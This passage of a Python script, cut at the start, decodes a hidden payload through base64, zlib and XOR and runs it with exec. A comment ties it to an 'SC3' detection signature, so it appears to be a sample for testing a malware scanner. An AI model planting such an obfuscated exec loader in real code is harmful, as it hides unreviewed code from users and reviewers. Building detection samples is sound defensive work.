FMY8wkL9KVqeOVjXzi/MhLMXH6GfJrHMgkZgfewLvTFxoJSBJTFOntsfmyHiZzkIW58LT6k76bgK7+8m1uV5qdX4Ga3/8BlONHvg=="
_K = bytes.fromhex("4326793d960a50765f19e36c")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
